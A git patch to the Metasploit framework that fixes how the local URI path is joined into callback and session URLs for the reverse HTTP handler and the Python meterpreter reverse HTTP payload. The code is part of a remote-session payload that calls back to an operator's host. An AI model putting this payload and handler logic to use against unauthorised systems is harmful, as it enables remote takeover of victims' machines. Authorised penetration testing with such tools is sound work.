From a74a7dde558368c49715c72101349de1be846b7a Mon Sep 17 00:00:00 2001
From: OJ <oj@buffered.io>
Date: Tue, 26 Jan 2016 00:34:19 +1000
Subject: [PATCH] More fixies for LURI in Python, and native too

---
 lib/msf/core/handler/reverse_http.rb          | 24 +++++++++----------
 .../python/meterpreter_reverse_http.rb        |  2 +-
 2 files changed, 12 insertions(+), 14 deletions(-)

diff --git a/lib/msf/core/handler/reverse_http.rb b/lib/msf/core/handler/reverse_http.rb
index 5315a90309..3d8a648aea 100644
--- a/lib/msf/core/handler/reverse_http.rb
+++ b/lib/msf/core/handler/reverse_http.rb
@@ -105,7 +105,7 @@ module ReverseHttp
       callback_host = "#{callback_name}:#{callback_port}"
     end
 
-    "#{scheme}://#{callback_host}#{luri}/"
+    "#{scheme}://#{callback_host}"
   end
 
   # Use the {#refname} to determine whether this handler uses SSL or not
@@ -264,12 +264,15 @@ protected
     uuid.arch      ||= obj.arch
     uuid.platform  ||= obj.platform
 
-    conn_id = nil
+    conn_id = luri
     if info[:mode] && info[:mode] != :connect
-      conn_id = generate_uri_uuid(URI_CHECKSUM_CONN, uuid)
+      conn_id << generate_uri_uuid(URI_CHECKSUM_CONN, uuid)
+    else
+      conn_id << req.relative_resource
+      conn_id = conn_id[0...-1] if conn_id[-1] == '/'
     end
 
-    request_summary = "#{req.relative_resource} with UA '#{req.headers['User-Agent']}'"
+    request_summary = "#{conn_id} with UA '#{req.headers['User-Agent']}'"
 
     # Validate known UUIDs for all requests if IgnoreUnknownPayloads is set
     if datastore['IgnoreUnknownPayloads'] && ! framework.uuid_db[uuid.puid_hex]
@@ -288,11 +291,6 @@ protected
 
     self.pending_connections += 1
 
-    unless luri.empty?
-      sep = conn_id && conn_id[0] == '/' ? '' : '/'
-      conn_id = "#{luri}#{sep}#{conn_id}"
-    end
-
     # Process the requested resource.
     case info[:mode]
       when :init_connect
@@ -401,15 +399,15 @@ protected
         print_status("Attaching orphaned/stageless session...")
 
         resp.body = ''
-        unless conn_id
-          conn_id = "#{luri}#{req.relative_resource}"
-        end
+
+        url = payload_uri(req) + conn_id
+        url << '/' unless url[-1] == '/'
 
         # Short-circuit the payload's handle_connection processing for create_session
         create_session(cli, {
           :passive_dispatcher => obj.service,
           :conn_id            => conn_id,
-          :url                => payload_uri(req) + conn_id + "/\x00",
+          :url                => url + "\x00",
           :expiration         => datastore['SessionExpirationTimeout'].to_i,
           :comm_timeout       => datastore['SessionCommunicationTimeout'].to_i,
           :retry_total        => datastore['SessionRetryTotal'].to_i,
diff --git a/modules/payloads/singles/python/meterpreter_reverse_http.rb b/modules/payloads/singles/python/meterpreter_reverse_http.rb
index 972e60276d..3ff53c83c1 100644
--- a/modules/payloads/singles/python/meterpreter_reverse_http.rb
+++ b/modules/payloads/singles/python/meterpreter_reverse_http.rb
@@ -35,7 +35,7 @@ module MetasploitModule
   def generate_reverse_http(opts={})
     opts[:uri_uuid_mode] = :init_connect
     met = stage_meterpreter({
-      http_url:        luri + generate_callback_url(opts),
+      http_url:        generate_callback_url(opts),
       http_user_agent: opts[:user_agent],
       http_proxy_host: opts[:proxy_host],
       http_proxy_port: opts[:proxy_port]